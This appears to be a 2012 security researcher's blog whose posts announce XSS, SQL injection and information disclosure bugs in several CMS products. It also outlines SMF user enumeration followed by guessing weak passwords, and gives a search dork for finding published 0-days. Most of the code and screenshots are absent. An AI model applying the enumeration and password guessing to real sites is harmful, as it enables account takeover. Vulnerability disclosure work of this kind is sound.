27.03 - eXtreme-fusion 4.5 XSS
26.03 - Joomla 2.5.3 few XSS
25.03 - Quick Cart 5.0 Information disclosure

25.04 - Quick Cart 5.0 CMS XSS

25.04 - Yaqas CMS (Alpha1) - multiple...

18.03 - Quick Cart 5.0 Information disclosure

18.03 - Quick CMS 4.0 XSS


So if You will find here any CMS that You are using right now - let me know
if You want test/patch it.

Tuesday, 17 April 2012

[EN] So You're looking 0dayzzzz...? ;]

Nice, me too. ;)

I see in stats that a lot of You searching here this way:'webapp-name 0day' enter!... ;>

Yes, Yes, 'Enter -> r00t'.

But maybe it'll be easier to ask?  

By the way, feel free to post in comments some others 'techniques' to 'finding 0dayz' ;P

Try this 4dv4nc3d ;)
@google: intext:0day site:pastebin.com ;)



Enjoy.

Monday, 16 April 2012

[EN] Docebo LMS (3605) - vulnerabilities - part1


Some information below:
http://sourceforge.net/projects/doceboreborn/

And some description:
"Docebo is a Learning Management System (LMS) or a Virtual Learning Environment (VLE). It is a Free web application for e-learning
THis projects aims to save the open source comnunity of docebo".

Ok, so now 'part1':
- 'html injection' attack:



- sql informations in debug:


 - information disclosure again:


- more soon...

[EN] SMF CMS 1.1.4 - User enumeration

... or 'user-grabber'.

'How to' do it it's not a secret because SMF provides possibility
of checking what are names of users 'registered'.

Anyway, if You are testing for example passwords in SMF installation,
You can do this steps for Your users (I mean: You are an admin of SMF You're checking...;))

(Example presented here actually won't give You "usernames",
You will get only 'ID's of registered (available) users. I thought givint tool to
'remote get all users' won't be a good idea ;))

a) code presented below should helps You how to automate 'user grabbing':

http://pastebin.com/VDfVg2hc
 b) output:

SMF 1.1.4 CMS - user grabber 

Now. For what it can be used.

If You're checking 'possible' (weak) passwords for 'all enumerated users'
You can try a little brute force for passwords (based on usernames) like this:
if user (name) grabbed  in scan then try to log in as him with password like user1, user123, 
resu, password... and all 'guessable' passwords.

If You're doing some pentest with 'password checking' scenarios, maybe this
should helps You a little (in automate some work) ;)

Let me know if You need help with implementing this for 2.0.2 in comments or mail.

More information about other 'enumeration-bugs' from March/April
You can find also here.

Enjoy!

o/

Sunday, 15 April 2012

[EN] Updates 15.04

Hi

I hope You have a good weekend;)

This week was so busy... So - few 'new' publicationswill be presented
here tomorrow!

Enjoy Your free time;]

Cheers o/

Wednesday, 11 April 2012

[EN] SMF 2.0.2 Information Disclosure Bug - UPDATED 16.04


In a free time... ;)

If You want some tools or test of Your webapps, let me know here;)

** UP UP ;)

Hello,

as I saw this bug in 2.0.2 I though maybe in 1.1.4 there is similar 'functionality' ;}

And... there is :) So:

today here will be smf-brute-forcer.php :*


** UP UP  * 22:12 * 16.04.2012 **;)

Some screens:

a) screen from 'hard coded' tool for getting 'path' from information disclosure bug: 



b) questions please at mail:




Cheers! o/ 

[EN] 2 do...

- eFront 3.6.10 vulns publication...
- some tools public
- maybe new surprise ;)

Ok, time to back to work o/

Tuesday, 10 April 2012

[EN] VirtueMart 2.0.2 Bugs - UPDATED!

Ok. :] (According to this;))

I just found some informations about "possible sql injection" in latest VirtueMart (2.0.2).
So yes, it is true. ;) But I'm not the author of 'public' ;D So I asked myt self how it was happened... ;]

Why I decide to write this here. I found this vulnerability in 5.04 this year, and now I saw that someone is public it (the same) at 6.04 ;)
So that's why I want to share with You a full detailed technical information about this "possibility".
(...)

Anyway, beside SQL-i, in VM there are some kind of other vulnerabilities. I'm talking about information disclosure bugs.
If user submit a 'wrong url' then (because of wrong validation) he can get /path/to/your/virtuemart.
This information can be usable to other (extend) attacks.

This is my first post here, so if I found an 'add image' option, I will paste it some screens.

Cheers! ;)
Jakub"

Details below:

1. Attacker can get information from database.


2. Some information disclosure bugs:
(2.1 "Brute" input)
And output:






3. SQL Injection *tmp* screens:


And last screen for "when did I found it":
 

Cheers! ;)